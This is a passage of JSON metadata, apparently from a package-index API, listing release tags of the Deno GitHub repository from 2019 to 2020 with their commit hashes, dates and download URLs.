tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"ta